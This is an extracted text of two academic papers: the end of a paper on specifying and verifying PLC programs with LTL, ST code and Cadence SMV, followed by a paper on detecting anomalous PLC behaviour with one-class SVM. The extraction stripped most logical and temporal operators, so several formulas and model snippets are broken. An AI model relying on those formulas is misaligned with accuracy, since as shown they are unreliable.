PLC and the problem statement. Such an approach to PLC programming somewhat solves the speci cation completeness problem. In this case, program speci cation is divided into two parts: 1) speci cation of the behavior of all program variables (except inputs), 2) speci cation of common program properties. The second part of speci cation affects the quantity and the meaning of internal auxiliary PLC program variables. While building a speci cation, it is important to take into consideration the order of temporal formulas describing the behavior of the variables. A certain variable without the _ pseudo-operator may be involved in the speci cation of another variable behavior only if the speci cation of its behavior is already completed and is in the text above. If necessary, we will use the Init keyword to indicate the variable s initial value. For example, Init(V) = 1 means that the V variable is initially set to 1. If the initial value of some variable is not de ned explicitly, it is assumed that this value is zero. IV. PROGRAMMING BY SPECIFICATION In this section we will explore a way of building a program ST-code according to the constructive LTL-specification of the program variable behavior. In general, the translation scheme of LTL formulas into the ST-code is the following. Two temporal formulas of the V variable, marked V+ (value increase, (1)) and V- (value decrease, (1 )) are set in conformity to the IF-ELSIF text block in the ST language IF OldValCond AND FiringCond THEN V := NewValExpr ; (* V+ *) ELSIF OldValCond AND FiringCond THEN V := NewValExpr ; (* V- *) END_IF. If the number of conjunctive blocks OldValCond i FiringCond i V = NewValExpr i in the LTL formulas is more than the considered two, then the number of alternative ELSIF branches will grow (by one branch per each new block). IF NOT _V AND FiringCond THEN V := 1; (* V+ *) ELSIF _V AND FiringCond THEN V : = 0; (* V -*) END_IF. In the case of programming the behavior of the V function- variable (3), we have a simple type assignment V := NewValExpr. (* V *) Each program variable must be defined in the description section (local or global) and initialized in accordance with the specification. Note that, for example, in the CoDeSys development environment [7] all variables are initialized to zero by default. In addition, we must implement the notion of the _ leading underscore pseudo-operator. In order to do that, an area for a pseudo-operator section is allocated at the end of the program. In this area, a V := V is assignment is added after the description of the behavior of all specification variables. The assignment is added for each such V variable, whose previous value was addressed as _V. The _V variable also has to be defined in the description section with the same initialization as for the V variable. Note that the approach to programming by specification that describes the reason of changing each program variable value looks very natural and reasonable, because the PLC output signal is a control signal, and changing its value usually carries an additional meaning. For example, it is important to clearly understand why an engine should be turned on/off, or some lamp must be switched on/off. Therefore, it seems quite obvious that every variable must be accompanied by two properties, one per each direction of change. It is assumed that if the conditions of the changes are not fulfilled, the variable retains its previous state. V. BUILDING AN SMV- MODEL BY SPECIFICATION We consider the Cadence SMV [12] verifier as a software tool of correctness analysis by means of model checking method. After a specification has been created, it is proposed 17 17 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. that a Kripke structure model in the SMV language be built that would further verify that the common program properties for this model are satisfied. If some common program property is not true for the model, the verifier builds an example of an incorrect path in the Kripke structure model, by means of which corrections are introduced into the specification. The PLC ST-program is built by the specification only after all the program properties have been verified and the verification has brought positive results. The means of the SMV language allow defining the variable value in the next state by using the next operator. The branching of the transition relation is provided by the nondeterministic assignment. For example, the next (V) : = {0, 1} assignment means that states and transitions to them will be generated both with the value of V =0 , and with the value of V =1 . In the SMV language, the & , | , ~ and > symbols denote the logical and , or , not , and implication, respectively. The SMV language is oriented on creating the next states of Kripke models from the current state. The initial current state of the model is the state of the program after initialization. Therefore, the specification of the behavior of the V (1) and (1 ) variables will be easier (clearer) if rewritten in the following equivalent form: V+: G(X(V>_V) X(OldValCond) X(FiringCond) X(V= NewValExpr)), V-: G(X(V<_V) X(OldValCond ) X(FiringCond ) X(V= NewValExpr )). We then get an SMV-model of the V variable behavior quire naturally by putting the next operator in conformity to the temporal X operator: case{next(OldValCond)&next(FiringCond) : next(V:=next(NewValExpr); next(OldValCond ) next(FiringCond ) : next(V):=next(NewValExpr ); default : next(V):=V;}. The default keyword stands for what must be happening by default, i.e. if conditions of the first two branches in the case block are not true. In the case of the boolean V variable specification (2) and (2 ) is converted to the following SMV-model case{ ~V&next(FiringCond ):next(V):=1; V&next(FiringCond ):next(V):=0; default :next(V:=V;}. A model of a function-variable behavior is defined simply as next(V):=next(NewValExpr) Let s now consider the specification of the behavior of a V substitution variable. In this case NewValExpr does not contain a _ pseudo-operator. This allows to rewrite the specification in the following equivalent form: V:XG(V=NewValExpr). In fact, this formula means that if the initial state of the model is not taken into account, then the V=NewValExpr equation must be true in all the other states of the model. The correctness of the XG(V=NewValExpr) formula results from the correctness of a slightly more general formula: G(V =NewValExpr). Therefore, the more general formula can be used as the constructive specification for building an SMV- model of the V substitution variable. An SMV-model is built by this specification simply in the form of an assignment V:=NewValExpr. The Cadence SMV verifier allows checking program models containing up to 59 binary variables (all variables are represented by sets of binary variables in the SMV). The substitution variables are not included in this number, i.e. only register variables and function variables are considered. VI. CONCLUSION The approach has been successfully proven on some (about a dozen) discrete logical control problems of different types with the average number of binary PLC inputs and outputs of about 30 and the total number of binary program variables of up to 59. For example, in order to exclude the possibility of bad product output in a plant, PLC program properties of conformance with the technological process of mix preparation and uninterrupted work of a hydraulic system (timely engagement of backup pumps) were verified. Also, PLC program properties of mandatory command execution for engaging an elevator cabin in a public library were tested. The verification was carried out on a PC with an Intel Core i7 2600K 3.40 GHz processor. It took the Cadence SMV verifier a mere few seconds to check the properties. Based on the results of this research, further work includes building software tools for modeling, specification, construction, and verification of PLC programs. REFERENCES [1] Kuzmin E. V., Sokolov V. A. Modeling, Speci cation and Construction of PLC-programs // Modeling and analysis of information systems. 2013. V. 20, 2 P. 104 120 [in Russian]. [2] Kuzmin E. V., Sokolov V. A. On Construction and Veri cation of PLC- programs // Modeling and analysis of information systems. 2012. V. 19, 4. P. 25 36. [In Russian]. [3] Kuzmin E. V., Sokolov V. A. On Veri cation of PLC-programsWritten in the LD-Language // Modeling and analysis of information systems. 2012. V. 19, 2. P. 138 144. [In Russian] [4] Petrov I. V. Programmiruemye kontrollery. Standartnye jazyki i priemy prikladnogo proektirovanija. M.: SOLON-Press, 2004. 256 p. [In Russian]. [5] Canet G., Couf n S., Lesage J.-J., Petit A., Schnoebelen Ph. Towards the Automatic Veri cation of PLC Programs Written in Instruction List // Proc. of the IEEE International Conference on Systems, Man and Cybernetics. Argos Press, 2000. P. 2449 2454. [6] Clark E. M., Grumberg O., Peled D. A. Model Checking. The MIT Press, 2001. [7] CoDeSys. Controller Development System. http://www.3s- software.com/ 18 18 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. [8] Gries D. The Science of Programming. Springer-Verlag, 1981. [9] Parr E. A. Programmable Controllers. An engineer s guide. Newnes, 2003. 442 p. [10] Pavlovic O., Pinger R., Kollman M. Autamotion of Formal Veri cation of PLC Programs Written in IL // Proceedings of 4th International Veri cation Workshop (VERIFY 07). Bremen, Germany, 2007. P. 152 163. [11] Rossi O., Schnoebelen Ph. Formal Modeling of Timed Function Blocks for the Automatic Veri cation of Ladder Diagram Programs // Proc. of the 4th International Conference on Automation of Mixed Processes: Hybrid Dynamic Systems, Shaker Verlag, 2000. P. 177 182. [12] SMV. The Cadence SMV Model Checker. http://www.kenmcmil.com/smv.html APPENDIX A (THE 31 LOGIC GAME ) Let s look at a 31 logic game, which is formulated as follows. There are two players. The players take turns. There are 24 playing cards laid out on the table in six rows, faces down: 4 aces (4 units) are in the first row, 4 deuces are in the second one, 4 triples are in the third one, 4 fours are in the fourth one, 4 fives are in the fifth one, 4 sixes are in the sixth one. The player turns over one card per one turn. Only the cards that are faced down can be turned over. The player loses if after his move the sum of the turned over cards exceeds 31. The task is to construct a PLC program (with 7 binary inputs and 18 binary outputs) for controlling the 31 game. If the PLC is the second player, the PLC must win every time when the first player starts the game by turning over a 3 , 4 or a 6 card. If the first player starts the game with a 1 , 2 or a 5 card, then the PLC must win if the first player does not resort to the complete take out strategies of the 1 , 2 or 5 respectively. Fig. 1 Control panel for the 31 logic game Fig. 1 shows a diagram of the game control panel. The buttons 1 , 2 , 3 , 4 , 5 and 6 are used for turning over the corresponding card. Pressing a button simultaneously with another button is thought as incorrect and is not taken into consideration. In that case, it should be un-pressed and then pressed correctly. After a correct pressing of one of the buttons, the corresponding value on the card display lessens by one. The initial display value is 4 for each display. The display values are limited by zero. The sum of the turned over cards is displayed on the sum display after each turn of the Player and/or the PLC. The Start button allows restarting the game. The latest move is indicated by turning on of one of the six lights located above the corresponding number. The corresponding Turn lights indicate the turns: Player or PLC . The corresponding Win light indicates the winner: Player or PLC . The PLC interface is shown on Fig. 2. Outputs, running out to sum display and card display , are not depicted on the interface in order to save space. Hereinafter code responsible for displaying information will be omitted for the same reasons. Common program properties and auxiliary variables Global variables of the PLC program are defined by the PLC interface. The auxiliary internal variables are usually needed to express common program properties taken from the problem statement and the necessity of implementing the algorithm. In this section, we are exploring some common program properties for the 31 logic game, as an example. These properties are specified as an LTL formula with the use of auxiliary variables. Fig. 2. PLC control interface of the 31 game It is important to note that the description of some internal variables and timers follows directly from the problem statement. For example, we will introduce V1, V2, V3, V4, V5 and V6 variables to store the number of unturned cards of different denomination, and Sum variable will be used to store the sum of the values of all turned cards. Other internal variables may appear for programming ease and program readability. The explicit common program properties for a logic game are those properties, which express the conformity between the program behavior and the winning strategies. The game strategy description assumes manipulation with the notion of a turn in general, meaning turning cards, as well as the notion of a concrete turn corresponding to turning a card of a specific denomination. For these purposes, we will introduce Mv1, Mv2, Mv3, Mv4, Mv5 and Mv6 variables. If the value of these variables is 1, it means that a turn consisting of turning over cards of 1, 2, 3, 4, 5 denominations and 6 respectively was performed. If the value of Mv is 1 , it means that a game turn was made on this run of the PLC working cycle. The PLC game strategy may vary depending on the resources or the availability of unturned cards. We will determine the impossibility for the PLC to make a turn according to the direct strategy with the Lck variable. We use the Rst variable to specify the necessity of resetting the game to the initial state. Incorrect pressing of buttons will be detected with the Skp variable. 19 19 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. So, let s consider some examples of common program properties for the 31 logic game. 1. G( PLCWin ManWin) means that there are no situations in which the PLC and the Player are winners at the same time. 2. The value of Sum variable always remains less than or equal to 37: G(Sum 37) 3. The formula G(Mv1 + Mv2 + Mv3 + Mv4 + Mv5 + Mv6 1) forbids making more than one game turn for one run of the PLC working cycle. 4. Pressing the PBStart button should lead to resetting the game to the initial state: G(PBStart=>V1=4 V2=4 V3=4 V4 =4 V5=4 V6=4 Mv Turn (PLCWin ManWin) Sum= 0). 5. If the game turn is performed infinitely often, the program will be in a PLC wins state, player wins state or initial state sooner or later from any reachable state: G(F(Mv))=> G(F(PLCWin ManWin PBStart)). 6. Let s consider only the behavior corresponding to a continuous normal game program i.e. when turns occur from time to time, and the PBStart reset button is pressed only when the game is ended by a win of one of the players. In this case each new game will always lead to a win of one of the players: G(F(Mv)) G( PBStart X(PBStart)=>(PLCWin ManWi n))=> G(PBStart X( PBStart)=> X( PBStart U(PLCWin Ma nWin))). 7. The following three properties correspond to the winning strategies of the PLC, if the Player starts the game by turning over the 3 , 4 or 6 card respectively: G(F(Mv)) G( PBStart X(PBStart)=>(PLCWin ManWin ))=> G(Mv3 Sum=3=>(( ManWin PLCWin) UPLCWin)); G(F(Mv)) G( PBStart X(PBStart)=>(PLCWin ManWin ))=> G(Mv4 Sum=4=>(( ManWin PLCWin) U PLCWin)); G(F(Mv)) G( PBStart X(PBStart)=>(PLCWin ManWin ))=> G(Mv6 Sum=6=>(( ManWin PLCWin) UPLCWin)). 8. The formula G(X(Mv1 Sum=1 Mv2 Sum=2 Mv3 Sum=3 Mv4 Sum=4 Mv5 Sum=5 Mv6 Sum=6)=> Turn) expresses the property that the first turn always belongs to the Player and not the PLC. The full LTL-specification for the 31 logic game follows. In the next sections, the ST-program and the SMV-model are constructed by this LTL specification. Specification for the 31 logic game 20 20 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. 21 21 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. 22 22 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply.
Detecting_anomalous_behavior_of_PLC_using_semi-supervised_machine_learning.pdf
Industrial Control System (ICS) is used to monitor and control critical infrastructures. Programmable logic controllers (PLCs) are major components of ICS, which are used to form automation system. It is important to protect PLCs from any attacks and undesired incidents. However, it is not easy to apply traditional tools and techniques to PLCs for security protection and forensics because of its unique architectures. Semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), has been applied successfully to many anomaly detection problems. This paper proposes a novel methodology to detect anomalous events of PLC by using OCSVM. The methodology was applied to a simulated traffic light control system to illustrate its effectiveness and accuracy. Our results show that high accuracy of identification of anomalous PLC operations is obtained which can help investigators to perform PLC forensics efficiently and effectively.
Detecting Anomalous Behavior of PLC using Semi- supervised Machine Learning Ken Yau, KP Chow, SM Yiu, CF Chan Department of Computer Science The University of Hong Kong Hong Kong, China {kkyau, chow, smyiu, cfchan}@cs.hku.hk Keywords Programming logic controller, forensics, machine learning I. INTRODUCTION Industrial Control System (ICS) system is used to monitor and control industrial and infrastructure processes such as chemical plant and oil refinery operations, electricity generation and distribution, and water management [1]. If any undesirable incidents happened to the systems, it may hazard human s lives, cause serious damage to our environment and enormous financial loss. It is important to protect the systems from any undesired incidents such as hardware failure, malicious intruders, accidents, natural disasters, accidental actions by insiders [5]. Traditionally, the control systems have been operated as isolated systems with no network connection to the world. Threats against these systems were limited to physical damage attacks or data tampering that originated inside the system. Nowadays, such systems are connected to the corporate networks and Internet over TCP/IP and wireless IP for improving performance and effectiveness [2]. As a result, the closed systems have been exposed to various Internet threats and attacks. Programmable Logic Controller (PLC) is an essential component of ICS. It is a special computer, which can be used to construct an automation system (from very simple one to a rather complicated one). An example of a simple automation system is Lighting Control System. The system is used to turn lights on automatically when the area becomes occupied and turn them off when the area becomes unoccupied. On the other hand, a group of PLCs can form a complex automation control system such as power generation system. PLCs in electricity generation system are responsible for automating numerous tasks that keep the electricity flowing to our home, offices and factories [3]. Because of the special architecture of PLC such as limited memory and proprietary operating system, it is difficult to apply contemporary tools and techniques for security protection and digital forensics. This paper proposes to adopt a semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), to detect PLC anomalous events. Although OCSVM has previously been applied successfully to anomaly detection problems such as detecting anomalous Windows registry accesses [25], it seems that it has not been used to detect PLC anomalous behavior. Compared to supervised machine learning, semi-supervised machine learning may be a better solution for PLC anomaly detection (see the followings for more elaboration). In our experiment, we selected a popular PLC, Siemens Simatic S7-1212C, and set up a common critical PLC application: simulated traffic light control system. Anomalous operations of traffic light control system were created in order to prove the effectiveness and accuracy of the methodology. The proposed methodology is an initial step for us to create a generic model to detect anomalous behavior of any PLC and other control programs even with limited domain knowledge of PLC applications. II. P ROGRAMMABLE LOGIC CONTROLLER Programmable Logic Controller (PLC) is a special form of microprocessor-based controller that uses a programmable memory to store instructions and to implement functions such as logic, sequencing, timing, counting and arithmetic in order to control machines and processes (Fig.1) [4]. When designing and implementing control applications, PLC programming is an important task. All PLCs have to be 978-1-5386-0683-4/17/$31.00 2017 IEEE2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 978-1-5386-0683-4/17/$31.00 2017 IEEE 580 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Programmable Logic Controller loaded with user program to control the status of outputs according to status of inputs. PLC can identify each input and output by address. For Siemens PLC, the inputs and outputs have their addresses in terms of the byte and bit numbers. For example, I0.7 is an input at bit 7 in byte 0 and Q0.7 is an output at bit 7 in byte 0. A PLC generates anomalous operations in the following situations [15]: (i) hardware failure; (ii) incompatible firmware version; (iii) control program bugs created by an authorized programmer or attacker; (iv) stop and start attacks; and (v) memory read and write attacks. In order to detect these kinds of anomalous operations, we do the followings. We first capture relevant values of memory addresses used by PLC control program in normal situation. The captured values are used to train a model for the normal behavior of PLC using the semi-supervised machine learning. The trained model can be used to classify whether the PLC events are in normal operation or not. To demonstrate our proposed methodology, we developed a control program by STEP 7 (Siemens programming software for S7 PLC programming, communication and configuration) for controlling traffic light control system (Fig. 2). A. Traffic Light Control System The setup of a simulated traffic light control system that we used in our experiment is shown in Fig 2. PLC Input I0.0 and I0.1 were connected with switches. PLC Output Q0.0, Q0.1, Q0.5, Q0.6, and Q0.7 were connected with lights. The traffic light control program (TLIGHT) was from the user guide SIEMENS SIMATIC S7-300 Programmable Controller Quick Start [6]. The control system is constructed by a set of instructions which are Inputs, Outputs, Memory Bit, and Timers. The instruction details are listed in Table I [6]. III. C HALLENGES OF PLC PROTECTION AND FORENSICS Traditional tools and techniques are not easy to apply directly to PLCs for security protection and forensic investigation because of its unique architectures, such as special operating systems and limited memory [9]. For example, there is no software can be installed to PLC to prevent and detect malicious software. Followings are PLC forensic challenges [8]: Lack of documentation: Insufficient low-level documentation available for PLC with serious implications for forensic investigations. Lack of domain specific knowledge and experience: There is no comprehensive knowledge for performing PLC forensics. Lack of security mechanisms: No logging systems for security and forensic purposes. Lack of forensic tools: No dedicated forensic tools for PLC to perform a comprehensive investigation. Availability / Always-On: The availability of PLC in ICS environment is always top priority. Therefore, it is not easy to shut down a PLC for forensic investigation. IV. M ACHINE LEARNING Machine learning is a method of data analysis. It builds an automated analytical model by using algorithms to learn from data iteratively. Based on the model, machine learning allows computers to find hidden insights without being explicitly programmed [10]. Supervised learning trains a model on known input and output data so that it can predict future outputs. Unsupervised learning finds hidden patterns or intrinsic structures in input data without knowing the corresponding labels of each input [11]. Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data) [7]. One-class Support Vector Machine(OCSVM) is a semi-unsupervised algorithm. A. One-class Support Vector Machine (OCSVM) In machine learning, OCSVM is an One-class classification, also known as unary classification, tries to identify objects of a specific class amongst all objects, by learning from a training set containing only the objects of that class [13] (Fig. 3). This paper utilizes OCSVM to train a model using data of normal situations (Training set), and classify PLC anomalous behavior that deviates from the trained model. This approach is suitable to deal with PLC anomalous behavior detection because OCSVM is suitable to deal with large amount of training data, since class labelling is not necessary. Also, it is relatively easy to gather training data of normal situations. On the other side, it is relatively difficult or impossible to collect data with a faulty system state. Even a faulty system state could be simulated, there is unlikely to guarantee that all the faulty state are simulated [12]. Fig. 2. PLC Inputs / Outputs connection with traffic lights 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 581 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. TABLE I. INSTRUCTIONS OF TRAFFIC LIGHT CONTROL SYSTEM Instruction Address Description Outputs Q 0.0 Red for pedestrians Q 0.1 Green for pedestrians Q 0.5 Red for vehicles Q 0.6 Yellow for vehicles Q 0.7 Green for vehicles Inputs I 0.0 Switch on right-hand side of street I 0.1 Switch on left-hand side of street Memory Bit M 0.0 Memory bit for switching the signal after a green request from a pedestrian Timers (on-delay timer) T 2 Duration (3 sec) of yellow phase for vehicles T 3 Duration(10 sec) of green phase for pedestrians T 4 Delay (6 sec) red phase for vehicles T 5 Duration (3 sec) of red/yellow phase for vehicles T 6 Delay (1 sec) next green request for pedestrians Fig. 3. One-class Classification V. LITERATURE REVIEW There are many research works focusing on ICS and PLC security protection and forensics after STUXNET malware attack discovered in 2010. STUXNET s target was to infect Siemens programming device (i.e., PC running Step 7 on Windows environment). The objective of the malware is to reprogram ICS by modifying code on the PLCs to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment [17]. An example is the research work of Jamie et al. [22], they present a new methodology for the development of a transparent expert system for the detection of wind turbine pitch faults utilizing a data-intensive machine learning approach. The expert system for the classification and detection of wind turbine pitch faults, as validated by the 85.50% classification accuracy achieved. Tina Wu and Jason Nurse have proved that PLC attacker s intentions can be determined by monitoring the memory addresses of user control program [16]. They identified the memory addresses used from the program code, and then monitored and recorded the values of the addresses by PLC Logger as a file (stored with normal PLC behavior). Based on the clear file, they can determine if the PLC is running normally or being attacked. Ken Yau and KP Chow have proposed two solutions to perform PLC forensics. The first solution was that they developed a Control Program Logic Change Detector (CPLCD) [14]. It worked with a set of Detection Rules (DRs) to detect and record undesired incidents, the incidents were interfering with the normal operations of PLC. The DRs were defined based on the PLC user control program. CPLCD program worked with the defined DRs to monitor memory variables of the control program to detect PLC Control Program Change Attack and PLC Memory Read and Write Logic Attack . Their second solution was that, they proposed to capture values of relevant memory addresses used by PLC control program as a data log file. Based on the log file, supervised machine learning was applied to identify anomalous PLC operations [15]. All the solutions mentioned above are able to detect malicious behavior of a specific PLC, and some solutions use supervised machine learning. However, they are not generic solutions. Investigator must fully understand PLC control program logics before applying these solutions to determine anomalous PLC behavior. Since each PLC installed with different control programs for different applications and some programs are extremely complicated, therefore, investigators are not easy to apply the above solutions to the real PLC control systems. Furthermore, it takes time to label large set of training data when using supervised machine learning. VI. E XPERIMENTAL SETUP AND METHODOLOGY This section describes the experimental setup and the proposed methodology for identifying PLC anomalous operations. A. Experimental Setup The experiments used a Siemens S7-1212C PLC loaded with the traffic light control program (TLIGHT) (Section IIA). The values of relevant memory addresses used by TLIGHT were captured in a log file via a program using the libnodave open sources library [18]. In particular, the program monitored the PLC memory addresses over the network and recorded the values along with their timestamps. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens Training Set 1 Trained Model Trained Model Test Set 2 Objects of specific class 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 582 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. S7 PLCs [19]. The overview of hardware experimental setup is shown in Fig. 4. Fig. 4. Overview of Hardware Experimental Setup B. Classifying Anomalous Behavior A machine learning technique typically splits the available dataset into two components: (i) training set for learning the properties of the data; and (ii) testing set for evaluating the learned properties of the data. The accuracy of the response prediction was evaluated based on the testing set [23]. An overview of PLC anomaly detection using OCSVM is shown in Fig 5 and the details are as follows: Step 1: To set up a simulated traffic light control system. The setup details are shown in Fig. 2. Step 2: To collect values of relevant memory addresses used by PLC program. To capture the values of relevant memory addresses used by PLC program in a log file. (Fig. 6). The memory addresses of traffic light control system are shown in Table I. The captured data in the log file was used for OCSVM model training. Step 3: To normalize the collected values as training set. To simplify the semi-supervised machine learning process, all the non-binary values of memory addresses (e.g., timers) were converted to binary values. Step 4: To train an OCSVM model by using the normalized values. To train a learning model, One-class SVM (sklearn.svm.OneClassSVM) of Scikit-learn is adopted. Scikit-learn is a free software machine learning library for the Python programming language [20]. Based on the training set of the captured data, OCSVM was applied to train a model. There are four kernel functions used in OCSVM which are Linear, Polynomial, Gaussian, and Sigmoid/Logistic. The kernels are functions used to define a similarity measure between two data points. After comparing the performance of the four kernel functions in our experiments, we found that the kernel Polynomial function provided higher accuracy of classification for the simulated traffic light control system. Polynomial Kernel: K(x,y) = (gamma*x*y + coef() ) ^ degree, the parameter settings are shown in Table II. Step 5: To create and collect PLC anomalous events for performance evaluation of the model. One computer was installed with Snap7 to create anomalous PLC operations by altering some values in address locations. Fig. 5. Overview of PLC Anomaly Detection using OCSVM Wireless AP Snap 7 Logging program PLC Switches Step 2 To collect values of relevant memory addresses used b y PLC program Step 3 To normalize the collected values as training set Step 4 To train an OCSVM model by using the normalized values Step 1 To set up a simulated traffic light control system Step 5 To create and collect PLC anomalous events for performance evaluation of the model Step 6 To evaluate the accuracy of the PLC anomaly detectio n 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 583 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 6. Data log file TABLE II. INPUT PARAMETER SETTINGS OF SCIKIT -LEARN ONE-CLASS SVM (OCSVM) Para- meter description Value degree Degree of the polynomial kernel function 3 coef0 coefficients 4 nu An upper bound on the fraction of training errors and a lower bound of the fraction of support vectors. Should be in the interval (0, 1]. 0.1 gamma gamma defines how much influence a single training example. The larger the gamma is, the closer other examples must be to be affected. 0.1 Test sets were created by capturing the values of the PLC memory addresses while performing the simulated attacks. The test sets contained normal and anomalous PLC events. Step 6: To evaluate the accuracy of the PLC anomaly detection. To evaluate the accuracy of the One-class SVM classification, one training set and three test sets were collect from the simulated traffic light control system. The trained model was evaluated by sklearn.metrics [24] and the classification results with five performance metrics are shown in Table III. The brief descriptions of the metrics are as follows: Accuracy: The accuracy is the ratio (tp + tn) / (p + n) where tp is the number of true positives and fn is the number of false negatives. P is the number of real positive cases in the data and n is the number of real negative cases in the data. Precision: The precision is the ratio tp / (tp + fp) where tp is the number of true positives and fp is the number of false positives. The precision is intuitively the ability of the classifier not to label as positive a sample that is negative. The best value is 1 and the worst value is 0. Recall: The recall is the ratio tp / (tp + fn) where tp is the number of true positives and fn is the number of false negatives. The recall is intuitively the ability of the classifier to find all the positive samples. The best value is 1 and the worst value is 0. F1: Score can be interpreted as a weighted average of the precision and recall, where an F1 score reaches its best value at 1 and worst score at 0. AUC: Area Under the Curve (AUC) is prediction scores which measured by the area under the ROC curve. An area of 1 represents a perfect test; an area of 0.5 represents a worthless test. VII. D ISCUSSION In the experiment, we made an assumption that the training set data collected from the traffic light system was in normal operations (without any anomalous events). This assumption is not unreasonable as we can collect data of normal behavior of the PLC during testing and maintenance. From the experimental results, high accuracy and high AUC of PLC anomalous operation detection were obtained. Since our logging program captures memory addresses of PLC with time stamps, OCSVM together with the time stamps information can help forensic investigators to carry out investigation efficiently. OCSVM was able to detect the simulated traffic light anomalous behavior in a dataset after OCSVM model was trained. Since each dataset was recorded with time stamps, we could know the date and time about the PLC anomalous events. According to the time stamps and the values of memory addresses in the dataset, the scope of investigation can be narrowed down. For example, if any firmware or user control program was updated, or any attack during a particular period of time, the proposed solution can identify the date and time about the anomalous events. According to the experiments, we found that it is important to select a correct kernel function with appropriate values of the function parameters in order to obtain a more accurate result of PLC anomaly detection. In our experiments, we chose kernel function Polynomial and adjusted the parameter values as Table II for classifying anomalous operations of the simulated traffic light system. As different control systems have different operational behavior, therefore, we believe that kernel type and values of parameters may be different for different kinds of PLC control systems. Comparing with supervised machine learning for PLC anomaly detection, OCSVM may be a better solution when the training set data is large and complicated because the training data for OCSVM is not necessary to be labelled. Class labelling is not an easy task for large set of data 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 584 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. because it is time consuming and always need to be performed by control system s experts. VIII. CONCLUSION AND FUTURE WORK To overcome the challenges of PLC protection and forensic investigation, this paper proposes to use semi-supervised machine learning, One-class SVM (OCSVM), to detect PLC anomalous behavior based on the captured values of PLC memory addresses. Our experiment demonstrates that our solution is feasible and practical to apply to the traffic light control system. This paper is an initial step of applying semi-supervised machine learning for PLC anomaly detection. In future, we will evaluate the feasibility and increase the accuracy to detect PLC anomalous behavior by applying semi-supervised algorithm on various PLC applications in ICS. In addition, we will try to create a generic model for PLC anomaly detection even when the PLC control program is not provided. TABLE III. OCSVM CLASSIFICATION RESULTS OF TRAFFIC LIGHT CONTROL SYSTEM R EFERENCES [1] Irfan Ahmed, Sebastian Obermeier and Martin Naedele, Golen G. Richard III: SCADA System: Challenges for Forensics Investigations, IEEE Computer, Vol. 45 No. 12, pp 44 51, USA, 2012. [2] T. Spyridopoulos , T. Tryfonas , J. May ,Incident analysis & digital forensics in SCADA and industrial control systems, System Safety Conference incorporating the Cyber Security Conference, 8th IET International, 2013. [3] Dillon Beresford, Exploiting Siemens Simatic S7 PLCs, Black Hat USA, 2011. [4] W. Bolton, Programmable Logic Controllers (4th Edition), 2006. [5] Keith Stouffer,Victoria Pillitteri, Suzanne Lightman, Marshall Abrams, Adam Hahn, Guide to Industrial Control Systems (ICS) Security, NIST Special Publication 800-82 Revision 2, U.S. Department of Commerce, 2015. [6] Siemens, SIMATIC S7-300 Programmable Controller Quick Start, Primer, Preface, C79000-G7076-C500-01, Nuremberg, Germany, 1996. [7] Semi-supervised learning (https://en.wikipedia.org/wiki/Semi-supervised_learning), 2017. [8] H. Patzlaff, D 7.1 Preliminary Report on Forensic Analysis for Industrial Systems, CRISALIS Consortium, Symantec, Sophia Antipolis, France, 2013. [9] Fabro, M: Recommended Practice: Creating Cyber Forensic Plan for Control Systems, Department of Homeland Security (2008), Idaho National Laboratory (INL), USA, 2008. [10] Machine Learning: What it is and why it matters (www.sas.com/it_it/insights/analytics/machine-learning.html), 2017. [11] Machine Learning in MATLAB (www.mathworks.com/help/stats/machine-learning-in-matlab.html), 2017. [12] Introduction to One-class Support Vector Machines (rvlasveld.github.io/blog/2013/07/12/introduction-to-one-class- support-vector-machines/), Last accessed on 2 May 2017, 2017. [13] One-class classification.com (en.wikipedia.org/wiki/One-class_classification), 2017. [14] Ken Yau and Kam-Pui Chow, PLC Forensics based on control program logic change detection, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [15] Ken Yau and Kam-Pui Chow, Detecting Anomalous Programmable Logic Controller Events using Machine Learning, (to be appeared in the proceedings of) The 13th Annual IFIP WG 11.9 International Conference on Digital Forensics, Orlando, FL., February 2017. [16] Tina Wu and Jason R.C. Nurse, Exploring the use of PLC debugging tools for digital forensic investigations on SCADA system, Journal of Digital Forensics, Security and Law, Vol. 9(2), 2015. [17] Nicolas Falliere, Liam O Murchu, and Eric Chien: W32.Stuxnet Dossier, Version 1.4, Symantec Corporation, 2011. [18] T. Hergenhahn, libnodave (sourcefor ge.net/projects/libnodave), 2014. [19] D. Nardella, Step 7 Open Source Ethernet Communication Suite, Bari, Italy (snap7.sourceforge.net), 2016. [20] sklearn.svm.OneClassSVM (scikit- learn.org/stable/modules/generated/sklearn.svm.OneClassSVM.html), 